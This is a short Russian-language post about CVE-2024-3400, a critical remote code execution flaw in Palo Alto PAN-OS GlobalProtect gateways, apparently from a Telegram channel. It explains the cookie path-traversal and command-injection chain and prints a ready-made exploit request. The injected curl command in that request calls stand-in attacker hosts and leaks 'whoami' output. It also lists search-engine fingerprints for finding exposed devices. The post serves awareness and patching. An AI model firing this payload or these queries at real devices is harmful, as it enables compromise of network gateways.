PurpleBear
@purple_medved
33 1.8K
RCE уязвимости CVE-2024-3400 (оценка по CVSS=10.0) максимально высокого уровня критичности были опубликованы на прошлой неделе. На этот раз отличился Palo Alto Networks - один из мировых лидеров в производстве сетевого оборудования. Эксплуатация 0day RCE уязвимости SSLVPN-решения GlobalProtect Gateway/Portal PAN-OS для получения первоначального доступа в рамках вредоносной кампании Operation MidnightEclipse была обнаружена исследователями из Volexity. RCE:Arbitrary File Write позволяет писать в директорию с логами телеметрии /opt/panlogs/tmp/device_telemetry/ с помощью Path Traversal в значении CookieCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}x1.outboundhost.com`;Command injection в функциональности кастомной библиотеки pansys.py, которая использует curl для отправки телеметрии с устройства по cron, с использованием модуля subprocess.Popen()IFS (Internal Field Separator)POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: target.com
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}attacker.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0Shodan всего 256 хостов пользователей PAN-OS😎, которым необходимо обновиться ASAPhttp.html_hash:-1303565546 services.http.response.body_hash="sha1:28f1cf539f855fff3400f6199f8912908f51e1e1Платформа использует файлы cookie для авторизации и сохранения настроек. Продолжая работу, вы соглашаетесь с нашей Политикой использования cookie.
Обсуждение 0
Обсуждение не доступно в веб-версии. Чтобы написать комментарий, перейдите в приложение Telegram.
Обсудить в Telegram